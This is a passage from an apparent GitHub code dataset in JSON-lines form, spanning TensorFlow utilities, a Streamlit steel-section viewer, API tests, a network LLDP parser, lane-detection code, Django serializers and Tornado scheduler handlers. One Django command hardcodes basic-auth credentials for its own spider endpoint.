shape=[total_size])\n idx = 0\n vs = []\n for shape in self._tensor_shapes:\n size = intprod(shape)\n vs.append(tf.reshape(ph[idx:idx + size], shape))\n idx += size\n return ph, vs\n\n @property\n def variables(self):\n if not hasattr(self, '_get_variables'):\n self._get_variables = build_get(self._tensors)\n return self._get_variables()\n\n @variables.setter\n def variables(self, vals):\n if not hasattr(self, '_set_variables'):\n self._set_variables = build_set(self._tensors)\n self._set_variables(*vals)\n\n @property\n def variable(self):\n return self.flatten(self.variables)\n\n @variable.setter\n def variable(self, val):\n self.variables = self.unflatten(val)\n\n\n\"\"\"\n\n\nCreate callable functions from tensors.\n\"\"\"\n\n\ndef function(inputs, outputs, updates=None, givens=None):\n \"\"\"Just like Theano function. Take a bunch of tensorflow placeholders and expressions\n computed based on those placeholders and produces f(inputs) -> outputs. 
Function f takes\n values to be fed to the input's placeholders and produces the values of the expressions\n in outputs.\n\n Input values can be passed in the same order as inputs or can be provided as kwargs based\n on placeholder name(passed to constructor or accessible via placeholder.op.name).\n\n Example:\n x = tf.placeholder(tf.int32, (), name=\"x\")\n y = tf.placeholder(tf.int32, (), name=\"y\")\n z = 3 * x + 2 * y\n lin = function([x, y], z, givens={y: 0})\n\n with single_threaded_session():\n initialize()\n\n assert lin(2) == 6\n assert lin(x=3) == 9\n assert lin(2, 2) == 10\n assert lin(x=2, y=3) == 12\n\n Parameters\n ----------\n inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]\n list of input arguments\n outputs: [tf.Variable] or tf.Variable\n list of outputs or a single output to be returned from function. Returned\n value will also have the same shape.\n \"\"\"\n if isinstance(outputs, list):\n return _Function(inputs, outputs, updates, givens=givens)\n elif isinstance(outputs, (dict, collections.OrderedDict)):\n f = _Function(inputs, outputs.values(), updates, givens=givens)\n return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))\n else:\n f = _Function(inputs, [outputs], updates, givens=givens)\n return lambda *args, **kwargs: f(*args, **kwargs)[0]\n\n\nclass _Function(object):\n def __init__(self, inputs, outputs, updates, givens):\n for inpt in inputs:\n if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):\n assert False, \"inputs should all be placeholders, constants, or have a make_feed_dict method\"\n self.inputs = inputs\n updates = updates or []\n self.update_group = tf.group(*updates)\n self.outputs_update = list(outputs) + [self.update_group]\n self.givens = {} if givens is None else givens\n\n def _feed_input(self, feed_dict, inpt, value):\n if hasattr(inpt, 'make_feed_dict'):\n feed_dict.update(inpt.make_feed_dict(value))\n else:\n feed_dict[inpt] = value\n\n def __call__(self, *args):\n assert len(args) <= len(self.inputs), \"Too many arguments provided\"\n feed_dict = {}\n # Update the args\n for inpt, value in zip(self.inputs, args):\n self._feed_input(feed_dict, inpt, value)\n # Update feed dict with givens.\n for inpt in self.givens:\n feed_dict[inpt] = feed_dict.get(inpt, self.givens[inpt])\n results = tf.get_default_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]\n return results\n","repo_name":"gtrll/rlfamily","sub_path":"rl/tools/utils/tf_utils.py","file_name":"tf_utils.py","file_ext":"py","file_size_in_byte":20597,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"36669648097","text":"\r\nimport streamlit as st\r\nfrom openpyxl import load_workbook\r\n\r\n\r\n\r\ndef st_database():\r\n\t#st.set_page_config(layout=\"wide\")\r\n\t\r\n\tdef caln():\r\n\t\tprop_arr=[]\r\n\t\tfor i in range(1,86):\r\n\t\t\tname_tr=sheet.cell(row=1,column=i).value\r\n\t\t\tprop_arr.append(name_tr)\r\n\t\tprop=st.selectbox('Select or write property',prop_arr)\r\n\t\tst.markdown(f\"\"\"# you selected {section}\"\"\")\r\n\t\tif section in name_tr_label:\r\n\t\t\tindi_name=name_tr_label.index(section)+1\r\n\t\tif prop in prop_arr:\r\n\t\t\tprop_name=prop_arr.index(prop)+1\r\n\t\t\t\r\n\t\t\t\r\n\t\tst.markdown(f\"\"\"# value : {prop} = {sheet.cell(row=indi_name,column=prop_name).value}\"\"\")\r\n\r\n\r\n\t\tj=0\r\n\t\tfor i in range(4,90):\r\n\t\t\tst.write(f'{prop_arr[j]} = 
{sheet.cell(row=indi_name,column=i-3).value}')\r\n\t\t\tj+=1\r\n\t\t\r\n\t\t\r\n\t\r\n\r\n\tst.title(\"AISC database version - v15 : \")\r\n \r\n\r\n\t\r\n\r\n\tif True:\r\n\r\n \r\n\t\twb=load_workbook('steel_db/aisc.xlsx')\r\n\t\tsheet=wb.active\r\n\t\tnames=[]\r\n\r\n\t\r\n\t\tname_tr_label=[]\r\n\t\tfor i in range(1,len(sheet['A'])+1):\r\n\t\t\tif i==1:\r\n\t\t\t\tname_tr_label.append('')\r\n\t\t\telse:\r\n\t\t\t\tname_tr=sheet.cell(row=i,column=3).value\r\n\t\t\t\tname_tr_label.append(name_tr)\r\n\t\tsection=st.selectbox('Select or write section',name_tr_label)\r\n\t\tcaln()\r\n\r\n\t\t\r\n \r\n\r\n","repo_name":"tanbin-hasnat-shehab/my_all_webapps","sub_path":"steel_db/stdb.py","file_name":"stdb.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
\"connector\": {\"name\": \"native\", \"parameters\": {\"path\": \":memory:\"}, \"id\": 1},\n }\n\n databases = Database.query.all()\n assert len(databases) == 1\n assert databases[0].id == 1\n\n\ndef test_post_queries(client):\n db_session = client.application.db_session\n connector = Connector(name=\"native\", parameters={\"path\": \":memory:\"})\n database = Database(name=\"main\", description=\"Main database\", connector=connector)\n db_session.add(database)\n db_session.commit()\n\n payload = {\n \"submitted_query\": \"SELECT 1 + 1\",\n }\n with freeze_time(\"2020-01-01T00:00:00Z\"):\n response = client.post(\n \"/api/v0/databases/main/queries\",\n data=json.dumps(payload),\n content_type=\"application/json\",\n )\n assert response.status_code == 201\n assert response.json == {\n \"submitted_query\": \"SELECT 1 + 1\",\n \"started\": \"2020-01-01T00:00:00\",\n \"results\": [{\"1 + 1\": 2}],\n \"id\": 1,\n \"scheduled\": \"2020-01-01T00:00:00\",\n \"executed_query\": \"SELECT 1 + 1\",\n \"ended\": \"2020-01-01T00:00:00\",\n \"database_id\": 1,\n }\n","repo_name":"betodealmeida/taliesin","sub_path":"tests/databases/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"40302372174","text":"import re\n\n# NOC modules\nfrom noc.core.script.base import BaseScript\nfrom noc.sa.interfaces.igetlldpneighbors import IGetLLDPNeighbors\n\n\nclass Script(BaseScript):\n name = \"3Com.4500.get_lldp_neighbors\"\n interface = IGetLLDPNeighbors\n\n rx_line = re.compile(\n r\"^\\s+LLDP\\sneighbor-information\\sof\\sport\\s\\d+\\[(?P\\S+)\\]:\\s+\"\n r\"Neighbor\\sindex\\s+:\\s+\\d+\\s+Update\\stime\\s+:\\s+\\d+\\sdays,\\d+\\shours,\\d+\\sminutes,\\d+\\sseconds\\s+\"\n r\"Chassis\\stype\\s+:\\s+(?P(\\S+ \\S+ \\S+|\\S+ \\S+|\\S+))\\s+\"\n r\"Chassis\\sID\\s+:\\s+(?P\\S+)\\s+Port ID type\\s+:\\s+(?P(\\S+ \\S+ \\S+|\\S+ \\S+|\\S+))\\s+\"\n r\"Port\\sID\\s+:\\s+(?P\\S+).\\s+Port\\sdescription\\s+:\\s+(\\S+ \\S+ \\S+|\\S+ \\S+|\\S+)\\s+\"\n r\"System\\sname\\s+:\\s+(?P\\S+)\",\n re.DOTALL | re.MULTILINE,\n )\n\n rx_capabilities = re.compile(\n r\"^\\s+System\\scapabilities\\senabled\\s+:\\s+(?P\\S+)$\", re.DOTALL | re.MULTILINE\n )\n\n def execute(self):\n r = []\n # Fallback to CLI\n lldp = self.cli(\"display lldp neighbor-information\")\n lldp = lldp.splitlines()\n for i in range(len(lldp) - 9):\n line = \"\"\n for j in range(9):\n line = line + \"\\n\" + lldp[i + j]\n\n match = self.rx_line.search(line)\n if match:\n local_interface = match.group(\"interface\")\n remote_chassis_id = match.group(\"chassis_id\")\n remote_port = match.group(\"port_id\")\n remote_port = remote_port.replace(\"gi\", \"Gi \")\n remote_system_name = match.group(\"name\")\n\n # Get remote chassis id subtype\n chassis_type = match.group(\"chassis_type\")\n # print chassis_type\n if chassis_type == \"MAC address\":\n remote_chassis_id_subtype = 4\n # Get remote port subtype\n port_type = match.group(\"port_type\")\n if port_type == \"Interface name\":\n remote_port_subtype = 3\n\n # Build neighbor data\n # Get capability\n while not self.rx_capabilities.search(lldp[i]):\n i += 1\n match = self.rx_capabilities.search(lldp[i])\n cap = 0\n for c in match.group(\"capabilities\").split(\",\"):\n c = c.strip()\n if c:\n cap |= {\n \"O\": 1,\n \"Repeater\": 2,\n \"WlanAccessPoint\": 3,\n \"Bridge\": 4,\n \"W\": 8,\n \"Router\": 16,\n \"T\": 32,\n \"C\": 64,\n \"S\": 128,\n \"D\": 256,\n \"H\": 512,\n \"TP\": 
1024,\n }[c]\n\n i = {\"local_interface\": local_interface, \"neighbors\": []}\n n = {\n \"remote_chassis_id\": remote_chassis_id,\n \"remote_port\": remote_port,\n \"remote_capabilities\": cap,\n \"remote_port_subtype\": remote_port_subtype,\n \"remote_chassis_id_subtype\": remote_chassis_id_subtype,\n \"remote_system_name\": remote_system_name,\n }\n\n i[\"neighbors\"] += [n]\n r += [i]\n\n return r\n","repo_name":"nocproject/noc","sub_path":"sa/profiles/3Com/4500/get_lldp_neighbors.py","file_name":"get_lldp_neighbors.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"51"} {"seq_id":"4325760600","text":"import cv2\r\nimport numpy as np\r\nimport utlis \r\n\r\n\r\n# A list to store the curvature values of the previous frames\r\ncurveList = []\r\n# The number of frames to average over when calculating the curvature\r\navgVal=10\r\n\r\n# The main function of the lane detection \r\ndef getLaneCurve(img,display=2):\r\n \"\"\"\r\n Takes an input image and returns the curvature of the lane.\r\n\r\n Parameters:\r\n img (numpy.ndarray): The input image.\r\n display (int, optional): The type of display to show. \r\n 0 - Displays nothing.\r\n 1 - Displays only the resulting image with the lane lines and curvature information overlaid.\r\n 2 - Displays intermediate processing steps in addition to the resulting image.\r\n\r\n Returns:\r\n float: The curvature of the lane, ranging from -1 (left curve) to 1 (right curve).\r\n \"\"\"\r\n # Create a copy of the input image\r\n imgCopy = img.copy()\r\n imgResult = img.copy()\r\n\r\n #### STEP 1: Thresholding ####\r\n # Apply thresholding to the image to obtain a binary image with white pixels representing the lane lines\r\n imgThres = utlis.thresholding(img)\r\n\r\n #### STEP 2: Warping ####\r\n # Get the dimensions of the input image\r\n hT, wT, c = img.shape\r\n # Get the points of the trapezoidal region of interest using the trackbar values\r\n points = utlis.valTrackbars()\r\n # Warp the binary image to obtain a bird's eye view of the lane lines\r\n imgWarp = utlis.warpImg(imgThres,points,wT,hT)\r\n # Draw the points of the trapezoidal region of interest on the input image for visualization\r\n imgWarpPoints = utlis.drawPoints(imgCopy,points)\r\n\r\n #### STEP 3: Histogram ####\r\n # Compute a histogram of the bottom half of the warped image to find the midpoint of the lane lines\r\n middlePoint,imgHist = utlis.getHistogram(imgWarp,display=True,minPer=0.5,region=4)\r\n # Compute the average point between the two lane lines as the curve average point\r\n curveAveragePoint, imgHist = utlis.getHistogram(imgWarp, display=True, minPer=0.9)\r\n # Compute the raw curvature of the lane by subtracting the midpoint from the curve average point\r\n curveRaw = curveAveragePoint - middlePoint\r\n\r\n #### STEP 4: Smoothing ####\r\n # Add the raw curvature to the curve list\r\n curveList.append(curveRaw)\r\n # If the curve list is longer than the average value, remove the oldest curvature value\r\n if len(curveList)>avgVal:\r\n curveList.pop(0)\r\n # Compute the average curvature from the last few frames\r\n curve = int(sum(curveList)/len(curveList))\r\n\r\n #### STEP 5: Visualization ####\r\n # Draw the lane lines and the curve information onto the bird's eye view of the image\r\n \r\n if display != 0:\r\n imgInvWarp = utlis.warpImg(imgWarp, points, wT, hT, inv=True)\r\n imgInvWarp = cv2.cvtColor(imgInvWarp, cv2.COLOR_GRAY2BGR)\r\n imgInvWarp[0:hT // 3, 0:wT] = 0, 0, 0\r\n 
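# Build a solid green frame, mask it to the lane region, and blend it onto the output below (clarifying comment added)\r\n 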
imgLaneColor = np.zeros_like(img)\r\n imgLaneColor[:] = 0, 255, 0\r\n imgLaneColor = cv2.bitwise_and(imgInvWarp, imgLaneColor)\r\n imgResult = cv2.addWeighted(imgResult, 1, imgLaneColor, 1, 0)\r\n midY = 450\r\n cv2.putText(imgResult, str(curve), (wT // 2 - 80, 85), cv2.FONT_HERSHEY_COMPLEX, 2, (255, 0, 255), 3)\r\n cv2.line(imgResult, (wT // 2, midY), (wT // 2 + (curve * 3), midY), (255, 0, 255), 5)\r\n cv2.line(imgResult, ((wT // 2 + (curve * 3)), midY - 25), (wT // 2 + (curve * 3), midY + 25), (0, 255, 0), 5)\r\n for x in range(-30, 30):\r\n w = wT // 20\r\n cv2.line(imgResult, (w * x + int(curve // 50), midY - 10),\r\n (w * x + int(curve // 50), midY + 10), (0, 0, 255), 2)\r\n #fps = cv2.getTickFrequency() / (cv2.getTickCount() - timer);\r\n #cv2.putText(imgResult, 'FPS ' + str(int(fps)), (20, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (230, 50, 50), 3);\r\n if display == 2:\r\n imgStacked = utlis.stackImages(0.7, ([img, imgWarpPoints, imgWarp],\r\n [imgHist, imgLaneColor, imgResult]))\r\n cv2.imshow('ImageStack', imgStacked)\r\n elif display == 1:\r\n cv2.imshow('Result', imgResult)\r\n\r\n # Return the curvature of the lane\r\n return curve/100\r\n\r\n\r\n\r\n\r\n","repo_name":"omarequalmars/Autonomous-Delivery-Robot-Repository","sub_path":"Computer Vision/Lane_Detection/LDM.py","file_name":"LDM.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} {"seq_id":"14775415384","text":"from rest_framework import serializers\n\nfrom . models import (\n Customer,\n Gender,\n Category,\n Size,\n Color,\n CouponOrder,\n CouponItem,\n Item,\n ItemVariation,\n OrderItem,\n Order,\n Payment,\n Address\n)\n\nclass CustomerSerializer(serializers.ModelSerializer):\n class Meta:\n model = Customer\n fields = [\n 'id','name','last_name',\n 'email','phone_number',\n 'customer_cookie_id',\n ]\n\n\nclass GenderSerializer(serializers.ModelSerializer):\n class Meta:\n model = Gender\n fields = ['id','gender']\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n class Meta:\n model = Category\n fields = ['id','name','gender']\n\n\nclass SizeSerializer(serializers.ModelSerializer):\n class Meta:\n model = Size\n fields = ['id','size']\n\nclass ColorSerializer(serializers.ModelSerializer):\n class Meta:\n model = Color\n fields = ['id','color']\n\n\nclass CouponOrderSerializer(serializers.ModelSerializer):\n class Meta:\n model = CouponOrder\n fields = ['id','code','percentage']\n\n\nclass CouponItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = CouponItem\n fields = ['id','code','percentage']\n\n\nclass ItemSerializer(serializers.ModelSerializer):\n category_name = serializers.ReadOnlyField(source='category.name')\n gender = serializers.ReadOnlyField(source='category.gender.gender')\n class Meta:\n model = Item\n fields = [\n 'id','name','price',\n 'discount_price',\n 'gender',\n 'category',\n 'category_name',\n 'label',\n 'description',\n 'imageURL1','imageURL2',\n 'imageURL3','imageURL4',\n ]\n\n\nclass ItemVariationSerializer(serializers.ModelSerializer):\n color_name = serializers.ReadOnlyField(source='color.color')\n size_name = serializers.ReadOnlyField(source='size.size')\n class Meta:\n model = ItemVariation\n fields = [\n 'id','item',\n 'size','color',\n 'stock',\n 'color_name',\n 'size_name',\n ]\n\n\nclass OrderItemSerializer(serializers.ModelSerializer):\n size = serializers.ReadOnlyField(source='item_variation.size.size')\n color = 
serializers.ReadOnlyField(source='item_variation.color.color')\n name = serializers.ReadOnlyField(source='item_variation.item.name')\n imgURL = serializers.ReadOnlyField(source='item_variation.item.imageURL1')\n class Meta:\n model = OrderItem\n fields = [\n 'id','customer',\n 'ordered','coupon',\n 'item_variation',\n 'size','color',\n 'name','quantity',\n 'total','imgURL',\n ]\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n coupon_code = serializers.ReadOnlyField(source='coupon.code')\n coupon_percentage = serializers.ReadOnlyField(source='coupon.percentage')\n class Meta:\n model = Order\n fields = [\n 'id','customer',\n 'ref_code','order_items',\n 'ordered','coupon',\n 'coupon_code',\n 'coupon_percentage',\n 'being_delivered',\n 'received','total',\n 'shipping_address',\n 'billing_address'\n ]\n\n\nclass PaymentSerializer(serializers.ModelSerializer):\n class Meta:\n model = Payment\n fields = [\n 'id','order',\n 'customer','amount',\n 'total_installment',\n 'installments',\n 'total_amount',\n 'timestamp',\n ]\n\n\nclass AddressSerializer(serializers.ModelSerializer):\n class Meta:\n model = Address\n fields = [\n 'id','street_name',\n 'street_number',\n 'floor','apartment',\n ]\n","repo_name":"vijo95/e-commerce_back","sub_path":"core/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} {"seq_id":"6900897721","text":"import requests\nimport time\nimport logging\nfrom applications.github.models import Repository\nfrom django.core.management import BaseCommand\n\n\nlogger = logging.getLogger('django')\n\nspider_url = \"https://spider.dapprank.com/schedule.json\"\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n for row in Repository.objects.all():\n data = {\n \"project\": \"muon\",\n \"spider\": \"repos\",\n \"repos_id\": row.id,\n \"url\": row.html_url,\n }\n\n res = requests.post(spider_url, data=data, auth=('spider', 'spider1@#'))\n if res.status_code == 200:\n print(res.json())\n else:\n logger.error(res.text)\n # print(res.text)\n time.sleep(3)\n","repo_name":"Bit03/gluon","sub_path":"applications/github/management/commands/running_repo_spider.py","file_name":"running_repo_spider.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} {"seq_id":"38925517072","text":"from numpy import zeros\r\n\r\ndef interwoven(str1, str2, target):\r\n if len(target) == 0:\r\n return True\r\n elif str1[0] == str2[0] == target[0]:\r\n return interwoven(str1[1:], str2, target[1:]) or interwoven(str1, str2[1:], target[1:])\r\n elif str1[0] == target[0]:\r\n return interwoven(str1[1:], str2, target[1:])\r\n elif str2[0] == target[0]:\r\n return interwoven(str1, str2[1:], target[1:])\r\n else:\r\n return False\r\nfile = open('test.txt')\r\ninput_lines = file.readlines()\r\ntarget = input_lines[0].rstrip()\r\nlines = [x.rstrip() for x in input_lines[1:]]\r\n\r\n # Initialize the zero matrix.\r\nM = zeros((len(lines), len(lines)), dtype=int)\r\n\r\n# Run through all combinations of dna strings.\r\nfor i in range(len(lines)):\r\n for j in range(len(lines)):\r\n if i <= j:\r\n # Count the combined number of each type of nucleotide in given dna strands.\r\n current_profile = [(lines[i] + lines[j]).count(nuc) for nuc in \"ACGT\"]\r\n # Compare the current profile to each substring of the same length in the superstring.\r\n for index in range(len(target) - 
len(lines[i]) - len(lines[j]) + 1):\r\n # Having an identical nucleotide profile is a necessary condition for being interweavable, and is far cheaper to check than a full interweave test.\r\n if current_profile == [target[index:index + len(lines[i]) + len(lines[j])].count(nuc)\r\n for nuc in \"ACGT\"]:\r\n # Check the interweave if the profiles match, add an extra character outside the alphabet to avoid index out of range errors.\r\n if interwoven(lines[i] + '$', lines[j] + '$',\r\n target[index:index + len(lines[i]) + len(lines[j])]):\r\n M[i][j] = 1\r\n break\r\n # The comparisons are symmetric, so we've already done these computations.\r\n else:\r\n M[i][j] = M[j][i]\r\n\r\nfor s in M:\r\n print(*s)\r\n","repo_name":"gromdimon/Bioinformatics_Stronghold","sub_path":"62. Finding Disjoint Motifs in a Gene.py","file_name":"62. Finding Disjoint Motifs in a Gene.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} {"seq_id":"1949551794","text":"import ast\nimport logging\nfrom time import time\nfrom tornado.web import RequestHandler\nfrom apscheduler.jobstores.base import JobLookupError\nfrom .forms import *\nfrom .parts import *\nfrom .bases import RestfulHandler\nfrom .executor.distribute import execute_task\nfrom model import Projects, Schedulers, Records\nfrom settings import schedulers, SECRET, ALGORITHM\n\n\n\"\"\"\n @apiDefine Operations\n @apiParam {Number} [limit=LIMIT_DEFAULT] Optional Limit with default LIMIT_DEFAULT.\n @apiParam {String} [ordering='id'] Optional Ordering default 'id'.\n @apiParam {Number} [offset=OFFSET_DEFAULT] Optional Offset with default OFFSET_DEFAULT.\n @apiParam {String} [fieldname] filter field.\n\"\"\"\n\"\"\"\n @apiDefine ErrorExamples\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'failed of parameters validator'}\n\"\"\"\n\n\nclass IndexHandler(RestfulHandler):\n\n # @authorization\n # async def get(self, *args, **kwargs):\n # sec = int(self.request.arguments.get('sec')[0])\n # schedulers.add_job(traversal_queue, 'interval', seconds=sec, max_instances=10)\n\n # async def get(self, *args, **kwargs):\n # print('this is index handler')\n # data = await get_spider_list('arts', '1550036771')\n # logging.warning(data)\n permission = 'observer'\n\n async def get(self, *args, **kwargs):\n \"\"\"\n @apiGroup Index-get\n @apiPermission Observer\n @api {get} /\n @apiHeader {String} Authorization Json Web Token\n @apiUse Operations\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {\n \"first name\": \"John\",\n \"last name\": \"Doe\"\n }\n \"\"\"\n jobs = get_current_jobs(schedulers.get_jobs())\n response = dict(count=len(jobs))\n response['result'] = jobs\n await self.over(data=response)\n\n\nclass ProjectsHandler(RestfulHandler):\n\n permission = 'developer'\n storage = FileStorage()\n\n async def get(self, *args, **kwargs):\n \"\"\"\n @apiGroup Projects-get\n @apiPermission Developer\n @api {get} /projects/\n @apiHeader {String} Authorization Json Web Token\n @apiUse Operations\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {'id': 1, 'project': 'arts', 'spiders': 'keeper, facts, hydra',\n 'version': 1560326985623, 'ssp': false, 'number': 3,\n 'filename': 'arts_1560326985623.egg', 'creator': 'username',\n 'create': 2019-02-22 10:00:00}\n \"\"\"\n arguments = ProjectsForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n params, offset, limit, ordering = 
prep(arguments)\n query = await Projects.filter(**params).offset(offset).limit(limit).order_by(ordering)\n response = dict(count=len(query))\n response['results'] = [\n {'id': i.id, 'project': i.project, 'spiders': i.spiders,\n 'version': i.version, 'ssp': i.ssp, 'number': i.number,\n 'filename': i.filename, 'creator': i.creator,\n 'create': i.create_time.strftime('%Y-%m-%d %H:%M:%S')}\n for i in query]\n await self.over(data=response)\n\n async def post(self, *args, **kwargs):\n \"\"\"\n @apiGroup Projects-post\n @apiPermission Developer\n @api {post} /projects/\n @apiHeader {String} Authorization Json Web Token\n @apiParam {String} project Project name.\n @apiParam {Bool} ssp Is ssp.\n @apiParam {File} eggs egg file.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 201 OK\n {'spider': spiders, 'number': number, 'message': 'successful'}\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'failed of parameters validator'}\n \"\"\"\n arguments = ProjectsForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n token = self.request.headers.get('Authorization')\n username = get_username(token)\n project = arguments.project.data\n ssp = arguments.ssp.data\n spiders = project\n number = 1\n eggs = self.request.files.get('eggs')\n version = str(round(time()))\n if not all([eggs, project, version]):\n return await self.interrupt(400, 'missing parameters')\n egg = eggs.pop()\n filename = egg['filename']\n if not filename.endswith('.egg'):\n return await self.interrupt(400, 'file is not egg')\n filename = await self.storage.put(egg['body'], project, version)\n if not ssp:\n gross = await get_spider_list(project, version)\n spiders = ','.join(gross)\n number = len(gross)\n await Projects.create(project=project, spiders=spiders, version=version,\n ssp=ssp, number=number, filename=filename, creator=username,\n create_time=datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n await self.over(201, {'spider': spiders, 'number': number, 'message': 'successful'})\n\n async def delete(self, *args, **kwargs):\n \"\"\"\n @apiGroup Projects-delete\n @apiPermission Developer\n @api {delete} /projects/\n @apiHeader {String} Authorization Json Web Token\n @apiParam {Int} id project id of databases.\n @apiParam {String} project Project name.\n @apiParam {Int} version project version.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 201 OK\n {'project': project, 'version': version, 'message': 'successful'}\n @apiUse ErrorExamples\n \"\"\"\n arguments = ProjectsForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n pid = arguments.id.data\n project = arguments.project.data\n version = arguments.version.data\n query = await Projects.filter(Q(id=pid) & Q(project=project) & Q(version=version))\n if query:\n try:\n await Projects.filter(id=pid).delete()\n result = self.storage.delete(self.storage.makepath(project, version))\n if result:\n return await self.over(200, {'project': project, 'version': version, 'message': 'successful'})\n except Exception as error:\n logging.warning(error)\n await self.over(400, {'project': project, 'version': version, 'message': 'failed'})\n\n\nclass SchedulersHandler(RestfulHandler):\n permission = 'developer'\n\n async def get(self, *args, **kwargs):\n \"\"\"\n @apiGroup Schedulers-get\n @apiPermission Developer\n @api {get} /Schedulers/\n @apiHeader {String} Authorization Json Web Token\n @apiUse Operations\n 
@apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {\"count\": 2,\n \"current\": {'id': 1, 'jid': 'p3fd0909803032nm', 'func': 'executor.rider'\n 'project': 'arts', 'spider': 'fact',\n 'version': 1563206963652, 'ssp': 1, 'job': 25fd-09098f-2032-dfs20,\n 'mode': 'date, 'timer': {'run_date': '2019-03-10'}, 'status': 1,\n 'creator': 'username'},\n \"result\": {'id': 1, 'jid': 'p3fd0909803032nm', 'project': 'arts', 'spider': 'fact',\n 'version': 1563206963652, 'ssp': 1, 'job': 25fd-09098f-2032-dfs20,\n 'mode': 'date, 'timer': {'run_date': '2019-03-10'}, 'status': 1,\n 'creator': 'username', 'create': 2019-02-22 10:00:00}\n }\n \"\"\"\n arguments = SchedulersForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n params, offset, limit, ordering = prep(arguments)\n query = await Schedulers.filter(**params).offset(offset).limit(limit).order_by(ordering)\n response = dict(count=len(query))\n response['current'] = get_current_jobs(schedulers.get_jobs())\n response['results'] = [\n {'id': i.id, 'jid': i.jid, 'project': i.project, 'spider': i.spider,\n 'version': i.version, 'ssp': i.ssp, 'job': i.job,\n 'mode': i.mode, 'timer': i.timer, 'status': i.status,\n 'creator': i.creator, 'create_time': i.create_time.strftime('%Y-%m-%d %H:%M:%S')}\n for i in query]\n await self.over(data=response)\n\n async def post(self, *args, **kwargs):\n \"\"\"\n @apiGroup Schedulers-post\n @apiPermission Developer\n @api {post} /schedulers/\n @apiHeader {String} Authorization Json Web Token\n @apiParam {String} project Project name.\n @apiParam {Int} version Project version.\n @apiParam {String} spider Spider name.\n @apiParam {Bool} ssp Is ssp.\n @apiParam {Bool} status Is is effective.\n @apiParam {String} mode 'date' or 'interval' or 'cron.\n @apiParam {Dict} timer {'seconds': 5} or {'run_date': '2019-02-20 18:00:00'}.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 201 OK\n {'project': project, 'version': version, 'status': status, 'message': 'successful'}\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'failed of parameters validator'}\n \"\"\"\n arguments = SchedulersForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n token = self.request.headers.get('Authorization')\n project = arguments.project.data\n version = arguments.version.data\n spider = arguments.spider.data\n ssp = arguments.ssp.data\n mode = arguments.mode.data\n username = get_username(token)\n # mode is interval, value {'seconds': 5}\n # mode is date, value {'run_date': '2019-02-13 17:05:05'}\n # mode is cron, value {'day_of_week': 'mon-fri', 'hour': 5, 'minute': 30, 'end_date': '2014-05-30'}\n try:\n timer = ast.literal_eval(arguments.timer.data)\n except Exception as error:\n logging.warning(error)\n return await self.interrupt(400, 'error of timer')\n if not isinstance(timer, dict):\n return await self.interrupt(400, 'error of timer')\n status = arguments.status.data\n jid = str(uuid1()) # scheduler job id, can remove job\n\n if status:\n schedulers.add_job(execute_task, mode, trigger_args=timer, id=jid,\n args=[project, spider, version, ssp, mode,\n arguments.timer.data, username, status])\n await Schedulers.create(project=project, spider=spider, version=version,\n ssp=ssp, mode=mode, timer=arguments.timer.data,\n creator=username, status=status, jid=jid,\n create_time=datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n await self.over(201, {'project': 
